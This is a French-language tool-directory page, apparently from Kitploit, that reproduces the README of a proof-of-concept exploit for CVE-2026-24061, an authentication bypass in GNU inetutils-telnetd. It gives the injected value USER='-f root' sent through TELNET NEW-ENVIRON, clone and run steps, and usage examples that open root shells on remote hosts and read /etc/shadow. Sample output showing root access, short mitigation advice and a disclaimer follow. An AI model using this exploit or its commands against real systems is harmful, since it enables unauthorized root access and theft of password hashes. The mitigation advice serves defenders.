Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061 — inetutils-telnetd Contournement de l'authentification - fonctionnel | Kitploit
Outils/GitHubGitHub/balgan/cve-2026-24061
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité RéseauTests d'IntrusionAuthentification
GitHubbalgan/cve-2026-24061

CVE-2026-24061

inetutils-telnetd Contournement de l'authentification - fonctionnel

Voir le dépôt
3il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24061 — Contournement d'authentification inetutils-telnetd

Une preuve de concept d'exploitation pour la vulnérabilité de contournement d'authentification dans GNU inetutils-telnetd.

Aperçu

CVE-2026-24061 est une vulnérabilité critique de contournement d'authentification affectant les versions 1.9.3 à 2.7 de inetutils-telnetd. Elle permet à un attaquant distant d'obtenir un shell root sur les systèmes vulnérables sans fournir d'identifiants.

Détails de la vulnérabilité

ChampValeur
ID CVECVE-2026-24061
Logiciel affectéGNU inetutils-telnetd
Versions affectées1.9.3 – 2.7
Type de vulnérabilitéContournement d'authentification
Score CVSSCritique
Vecteur d'attaqueRéseau

Comment cela fonctionne

La vulnérabilité exploite une faille dans la façon dont telnetd gère la variable d'environnement USER reçue via l'option TELNET NEW-ENVIRON (RFC 1572) pendant la négociation du protocole.

  1. Négociation du protocole TELNET : Lorsqu'un client se connecte, le serveur et le client négocient les capacités, y compris l'option NEW-ENVIRON, qui permet au client d'envoyer des variables d'environnement.

  2. Valeur USER malveillante : L'exploit envoie USER=-f root comme variable d'environnement pendant cette phase de négociation.

  3. Passage d'arguments non sécurisé : Le telnetd vulnérable transmet cette valeur non assainie au programme login.

  4. Injection de commande : Le programme login interprète -f root comme des options de ligne de commande :

    • -f = « forcer la connexion sans authentification »
    • root = le nom d'utilisateur avec lequel se connecter
  5. Accès root : L'attaquant obtient un shell root sans jamais être invité à saisir un mot de passe.

Le problème fondamental

root@kitploit:~
Client envoie :  USER = "-f root"
telnetd exécute :  login -f root
Résultat :        Shell root accordé sans authentification

Cela équivaut à exécuter USER='-f root' telnet -a localhost sur un système avec un telnetd vulnérable.

Prérequis

  • Python 3.6+
  • Aucune dépendance externe (utilise uniquement la bibliothèque standard)

Installation

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py

Utilisation

root@kitploit:~
./exploit.py [OPTIONS] <cible>

Options

OptionDescriptionDéfaut
hostNom d'hôte ou adresse IP cibleRequis
-p, --portPort cible23
-u, --userValeur USER à injecter-f root
-c, --commandExécuter une seule commande (non interactif)Aucun
-t, --timeoutDélai d'expiration de connexion en secondes10

Exemples

Shell root interactif sur localhost :

root@kitploit:~
./exploit.py localhost

Shell root interactif sur un hôte distant :

root@kitploit:~
./exploit.py 192.168.1.100

Exécuter une seule commande puis quitter :

root@kitploit:~
./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local

Se connecter en tant qu'utilisateur différent :

root@kitploit:~
./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server

Port non standard :

root@kitploit:~
./exploit.py -p 2323 localhost

Combiner les options :

root@kitploit:~
./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100

Mode interactif

Lorsqu'il est exécuté sans l'option -c, l'exploit vous place dans un shell interactif :

  • Prise en charge complète du TTY avec gestion appropriée du terminal
  • Appuyez sur Ctrl+] pour vous échapper et fermer la connexion
  • Appuyez sur Ctrl+C pour interrompre

Exemple de sortie

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-24061 - inetutils-telnetd Authentication Bypass    ║
║  Affects: inetutils-telnetd 1.9.3 - 2.7                      ║
╚══════════════════════════════════════════════════════════════╝

[*] Connected to 192.168.1.100:23
[*] Negotiating TELNET options...
[*] Agreed to NEW-ENVIRON (sending USER='-f root')
[+] Sent USER='-f root' via NEW-ENVIRON

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 

Atténuation

Actions immédiates

  1. Désactiver telnetd : Si ce n'est pas strictement nécessaire, désactivez entièrement le service telnet

    root@kitploit:~
    sudo systemctl stop inetutils-telnetd
    sudo systemctl disable inetutils-telnetd
    
  2. Utiliser SSH à la place : Remplacez telnet par SSH pour l'accès à distance

    root@kitploit:~
    sudo apt install openssh-server
    
  3. Règles de pare-feu : Bloquez le port 23 depuis les réseaux non fiables

    root@kitploit:~
    sudo ufw deny 23/tcp
    

Correctif à long terme

  • Mettez à jour vers une version corrigée d'inetutils lorsqu'elle sera disponible
  • Surveillez les avis des fournisseurs pour les correctifs de sécurité

Détails techniques

L'exploit implémente un client TELNET minimal qui :

  1. Établit une connexion TCP vers la cible
  2. Répond aux négociations d'options TELNET (DO/DONT/WILL/WONT)
  3. Lorsque le serveur demande des variables d'environnement via NEW-ENVIRON :
    • Envoie USER=-f root dans la réponse ENV_IS
  4. Gère les négociations de type de terminal (TTYPE) et de taille de fenêtre (NAWS)
  5. Fournit des modes interactif ou d'exécution de commandes

RFC pertinentes

  • RFC 854 — Spécification du protocole TELNET
  • RFC 1572 — Option d'environnement TELNET

Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

  • Utilisez cet exploit uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester
  • L'accès non autorisé à des systèmes informatiques est illégal dans la plupart des juridictions
  • Les auteurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par cet outil

Licence

Licence MIT — Voir LICENSE pour plus de détails.

Références

  • Détails du CVE-2026-24061
  • GNU inetutils
  • Protocole TELNET RFC 854
Télécharger l’outil